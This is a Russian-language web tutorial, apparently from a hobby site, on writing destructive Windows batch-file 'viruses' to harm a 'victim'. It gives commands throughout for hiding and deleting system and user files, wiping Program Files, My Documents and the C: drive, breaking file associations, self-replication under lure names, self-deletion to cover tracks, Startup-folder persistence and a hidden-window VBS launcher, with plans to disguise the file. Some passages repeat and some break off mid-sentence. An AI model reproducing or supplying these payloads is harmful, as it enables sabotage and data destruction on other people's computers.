Пишешь там команды - так называемое ТЕЛО вируса

Открываешь блокнот

Пишешь там команды - так называемое ТЕЛО вируса

3. дальше Файл -- Сохранить как -- и теперь пишешь имя и расширение т.е. *.bat

4. * (звездочка) это любое имя, как на английском, так и на русском.

Т.е. у тебя было так: Текстовый документ. txt (по умолчанию)

А ты сделай вот так: Текстовый документ. bat (батовский)

Но вы не тупые и конечно же поняли что необязательно называть "текстовый документ.bat", можно к примеру назвать prikol.bat, или еще как нибудь. Ну там дальше работает фантазия...:) И оставьте пожалуйста Ваш комментарий в нашей гостевой книге! Нам будет очень интересно узнать Ваше мнение!

Первая статья про написание бат вирусов.

Итак, чтобы создать бат вирус нужно открыть блокнот написать команды,и сохранить с разрешением.bat К командам существуют и специальные параметры определяющие как команда будет выполняться. Вот например после команды start мы видим параметр /min - он запускает приложение, но в свёрнутом виде. Если за место него мы написали бы /max, то приложение соответственно запустилось во весь экран, развёрнутое. У команды start ещё есть с десяток параметров, но о них я вам говорить не стану т.к. они нам не чем не помогут (зачем нам задавать приоритет приложения?). В таблице написано приложение и команда которая его запускает:

Настройка системы- start msconfig

Калькулятор - calc

Помощь- start HelpCtr

Редактор символов- eudcedit

Таблица символов - charmap

Буфер обмена - clipbrd

Музон dvdplay

Диспетчер задач - taskmgr

Громкость -sndvol32

Доктор Ватсон -drwatson

Отладчик доктора- drwtsn32

Дефрагментация диска С: - defrag C:

Проверка диска - chkdsk

И ещё чтоб вы знали. Как же всё это выполняется, ведь команд куча, все они требуют приложения которое будет их выполнять. Неужели это всё одна программа? Нет, программа "cmd" служит для того чтобы через неё запускать другие программы. Вот например есть такая команда mem, введите её и увидите сведения о памяти вашего компа. Так вот, этой командой заправляет отдельное приложение. Оно так и называется mem. Лежит это приложение в C:WINDOWSsystem32 и есть ещё резервная копия по адресу: C:WINDOWSsystem32dllcache. Это для того чтобы восстановиться от нечаянного удаления нужных файлов. Так вот к чему рассказ, удалите в этих двух директориях приложение "mem.exe" и теперь введите в командную строку, вам не чего не покажут разве лишь только ошибку, или может даже то, что системного файла не хватает. Из этого следует вывод, если удалить приложения стирания, перемещения, то командные файлы у вас не сработают. Но я думаю "жертва" об этом даже не догадывается... Теперь приступим к написанию команд для человека, которому вы хотели бы сильно (или не очень сильно) навредить! Для начала напишем команду, которая не удаляет файлы, а просто ставит на них атрибут «Скрытый» и «Системный» и после запуска команды файлики исчезнут. Просто пишем:

attrib +h +s Используемые параметры в команде attrib:

+r Установка атрибута «Только чтение».

-r Снятие атрибута «Только чтение».

+a Установка атрибута «Архивный».

-a Снятие атрибута «Архивный».

+s Установка атрибута «Системный».

-s Снятие атрибута «Системный».

-h Снятие атрибута «Скрытый».

+h Установка атрибута «Скрытый».

Но мы будем только пользоваться двумя, может тремя. Давайте для начала скроем папку WINDOWS, чтобы перепуганный новичок орал «Х-де моя папка WINDOWS!» пишем:

attrib +h +s C:/WINDOWS

Или же можно скрыть файлы (вложенные папки остануться) в самой папке:

attrib +h +s C:/WINDOWS/*.*

можно поступить иначе:

cd C:windows переходим в папку «windows»
attrib +h +s и ставим атрибуты

У нас новая команда cd после неё пишем путь к директории и последующие команды будут применяться к этой папке. Почему надо ставить два атрибута? Достаточно поставить один "Скрытый" и он скроется? В принципе у ламера да, но если вы поставили в свойствах папки "Показывать скрытые файлы и папки", то фишка не прокатит, а с двумя параметрами файл можно только увидеть в FAR, или Commander (это файловые менеджеры).

А если мы хотим снять все атрибуты со всех файлов в этом каталоге, да и ещё и подкаталог? Для снятия или назначение атрибутов в подкаталоги надо воспользоваться параметром /s. Например для снятия всех атрибутов со всех файлов в этой папке и всех её подпапках пишем:

attrib -r -s -h -a *.* /s

Существует ещё одна загвоздка, а если на подпаке стоят атрибуты, то с неё команда снимет их? Нет, она не снимет не с этой папки, не с файлов которые в этой скрытой папке находятся. Поэтому нам нужен ещё один параметр для снятия атрибутов с папок /d. Например если мы хотим снять атрибуты ну со всего что только возможно в папки "Windows" нам надо написать:

attrib -r -s -h C:WINDOWS*.* /s /d

Ну не обязательно именно эта папка можно такую команду применить для других папок, например можно скрыть ненужный мусор, который следует удалить, а не как… ну об этом в главе: «Заполняем место мусором» Или какими он часто пользуется папками и файлами? Ну я думаю на "Рабочем столе" он держит кучу ярлыков. А если они исчезнут? Он их поставит опять, а мы сделаем запуск нашего вируса с каждым включением компа и сколько бы он раз заново не ставил свои ярлыки, они всё исчезают и исчезают,... но об этом потом.

Я думаю вы не станете биться в бешеном припадке если тестируя вирус скроете свои папки... Просто напишите команду которая снимает атрибуты...

Безвозвратное удаление

Ну что, сейчас пойдут команды удаления. Интуиция вам подсказывает что удаление это плохо...

del *.* /q

После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в каталогах и подкаталогах. Параметр /q задаёт удаление без подтверждения. Теперь мы удалим шрифты:

Del C:windowsfonts /q

Почему без /s? А зачем, там нет подпапок. Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

Del C:windowsMedia /q

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

Del C:windowssystem32 /q /s

Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты "Скрытый" и "Системный" то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечаянного стирания). Что в этом случае делать? Придётся сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога. Надеюсь вы помните главу "Хд-е мои файлы"? Командой del мы хоть и удаляем файлы, а папки то останутся, но есть команда которая стирает папки вместе с файлами:

rd C:windowsMedia /s /q и все папочки и файлики удаляться. Вы спросите, ну если команда rd так хороша, зачем нужна команда del? Ответ прост, вы попробуйте удалить командой rd, допустим только ярлыки рабочего стола, или только рисунки в папке windows. Командой del это делается так:

del C:windows*.bmp /q /s И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска.bmp если поставить.txt то удаляться текстовые файлы, об этом в главе "Маски" Файл можно ещё и просто не удаляя переместить, например:

move C:WINDOWS*.txt C:Text /y На команде видно что мы перемещаем все текстовые файлы в папку "Text" на диске C: (в папке WINDOWS их уже не будет, это же перемещение, где взяли там уже нет). Что интересно мы наносим такой же вред как и при удалении ведь комп будет считать что там этих файлов уже нет. (Правда удалять быстрее). Параметр /y выключает предупреждения о перезаписи, если вдруг имена совпадут.

А теперь попробуйте догадаться что попытается сделать эта команда:

Rd C: /s /q

И ещё напоследок чтобы хорошенько усвоили, комп не даёт вам просто так удалять системные и скрытые файлы, надо сначала снять все атрибуты. Иначе облом. Но этот процесс офигеть длительный так что лучше снимать только с определённых файлов, но это надо знать с каких. Так что чтобы написать вирус вам надо самим знать какие файлы системные и стандартные. Прочитать много книг и... убить Билла Гейца и занять его пост!

Премудрости удаления

 

Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить… Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

attrib -a -s -h -r C:*.*
del C:*.* /q

Но тут нам много удалить не дадут. Всё триста раз защищено. Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

rd %ProgramFiles% /s /q А вот если написать:

rd C:Program Files /s /q то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное: Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст. del "%USERPROFILE%Мои документы*.*" /q /s

Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles% И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp 1251

А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде: for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).

Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.

if not VIR*?????????.sys goto x
exit
:x
МУСОР.

Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение.sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова. Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора. p>И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O"; "P"; "Q"; "R"; "S"; "T"; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна. Маленькие команды Тут написаны команды для которых отдельная глава много...

Самоликвидация

Эта команда удаляет сама себя, пишите её в самом конце вашего вируса и всё, ни кто не узнает, что вы испортили на его компе чтобы сразу эту пакость не исправить.

del %0

Клонирование

Эта команда копирует себя в другое место. Так можно наклонироваться по всему диску, Нет, нет, да кто нибудь запустит интересный "setup" или "games"

copy %0 C:setup.bat
copy %0 D:games.bat
copy %0 C:windows/sex.bat ну и.т.д.

Можно изменить текущее время на своё:

Time 00:00

Можно изменить текущую дату:

Date 01.01.50

chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
md 1 ….и.т.д.

допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их

Пытаемся повесить систему
Как я уже говорил в начальной главе чтобы запустить какую-нибудь программу надо написать start в начале строки и команду например:

Опасные bat вирусы

продолжение...

В предыдущей статье вы узнали базовые команды bat вирусов. А вторую часть можно было скачать отдельно. Однако исходя из пожеланий посетителей (которые оставляют их в своих письмах на мою почту), я решил выложить и вторую статью. Итак, вот она:

В предыдущей статье вы узнали о базовых командах для создания bat вирусов. Здесь же будут представлены более сложные команды
1.
Shutdown -f -Эта команда выключает компьютер
del *.* /q -После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в каталогах и подкаталогах. Параметр /q задаёт удаление без подтверждения.

Теперь мы удалим шрифты:

Del C:windowsfonts /q

Почему без /s? А зачем, там нет подпапок. Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

Del C:windowsMedia /q

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

Del C:windowssystem32 /q /s

Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох, если на файле будут стоять атрибуты "Скрытый" и "Системный" то наше удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечаянного стирания). Что в этом случае делать? Придётся сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.

del C:windows*.bmp /q /s

Премудрости удаления

Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить… Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит ничего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

attrib -a -s -h -r C:*.*
del C:*.* /q

Но тут нам много удалить не дадут. Всё триста раз защищено.
Можно, например, попробовать удалить УСТАНОВЛЕННЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

rd %ProgramFiles% /s /q

А вот если написать:

Rd C:Program Files /s /q

то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно, у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы", то вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:

Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.
del "%USERPROFILE%Мои документы*.*" /q /s

Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корневой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%. И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp1251

А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде:

for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q

Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну, суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).
Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то снова создаст мусор.

if not VIR*?????????.sys goto x
exit
:x
МУСОР.

Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение.sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова. Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора.

И ещё, я что то всё говорю путь диск C:, диск C:, но для полной уверености можно, я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O"; "P"; "Q"; "R"; "S"; "T"; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна.

Удалим расширение

Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно! Вы только представьте, чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…

assoc.lnk=.avi

здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно.lnk) на музыкальное расширение.avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение.exe и тогда ни одна программа, ни запуститься!!!

assoc.exe=.avi

тут показано расширение программ.exe ну и уже по традиции я меняю его на.avi Вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на.virus вот весело будет когда он захочет посмотреть свои картинки…
Можно же просто удалить расширение, не заменяя его на другое:

assoc.exe=

После знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик. Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые) Здесь я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои:

• Приложение.exe.com
• Текстовые файлы doc.txt.wp.diz.log.wri
• Музыкальные файлы.mp3.wav.avi.wmv.mpg
• Картинки.bmp.jpg.gif.tif.pic
• Ярлыки.lnk.url
• Архиваторы.rar.zip.arj.cab lzh.
• Шрифты fon.ttf.atm
• Файл реестра.reg.key
• Системные файлы.sys.dll.rnf.drv.ega
• Файл справки.chm.hlp

Можно путь для копирования поставить другой путь:

copy C:*.* C: program наш никчёмный файл появиться на диске С:

можно скопировать, что-нибудь другое:

copy C:windowssystem32*.* C:Microsoft*.exe

Видно что все файлы будь это текст, или музыка мы сохраняем как приложение *.exe. Но это уже очень длительный процесс (копировать всё из system32). Есть другой способ копирования:

dir c: /s/a > C:/1.txt

Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:

copy C:WINDOWS*.txt + C:WINDOWSHelp*.* KYSOK

Мы видим что я беру из папки "Windows" все текстовые файлы а из папки "Help" вообще все файлы и слепливаю кусок из всех них в файл "KUSOK" (од даже будет без расширения, но можно его и сделать, если пожелаете)

А можно полностью скопировать папку "system32" в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.

xcopy C:WINDOWSWeb C:mysor /q /e /h /y копируем папку web в папку musor.
attrib +h +s C:/mysor всё скрываем с глаз людских.

Если посмотреть, то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються, так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, а так как вопросы нам не нужны, вот мы влепили параметр /y.

Ах, совсем забыл, не пишите вот такую команду:

copy C:*.* C:Windows

Тут так же действует вывод сообщения, но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно не будет отвлекаться.

Можно остоновить выполнение нашего вируса хитрой командой. Вылетит собщение "Для продолжения нажмите любую клавишу...".

Pause

А теперь закинем вирус в автозагрузку. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит и многократное выключение не удаться:

Chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
attrib +h

вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.
Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала - просто убрала все элементы и как будто их и не было.
И еще, бывает так: жертва открывает вирус, видит выскакивающее окно и быстренько его закрывает, и всё вирус не сработал! Но я нашёл способ чтоб окно не открывалось - нужно вписать скрипт в самораспоковывающийся архив и именно его архив и должен открыть, а скрипт этот мы будем писать на vbs его можно создать в блокноте а прописывать мы там будем Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run"C:sistem32Connect.bat ", 0, true

Ну вот и все! Кстати протестировать получившийся вирус у себя на компе можно на виртуальной машине. Что это такое и скачать бесплатно виртуальную машину можно там же. Ну а на следующем уроке поговорим как сделать из этого вируса настоящее exe приложение с лицензионным соглашением. А то отослали вы вирус жертве, а она его не открыла потому что значок какой то странный и расширение неизвестное... Я вас научу как сделать так, чтоб у жертвы не было ни малейшего сомнения! Итак

 

Открываешь блокнот

пишешь там команды - так называемое ТЕЛО вируса

3. дальше Файл -- Сохранить как -- и теперь пишешь имя и расширение т.е. *.bat

4. * (звездочка) это любое имя, как на английском, так и на русском.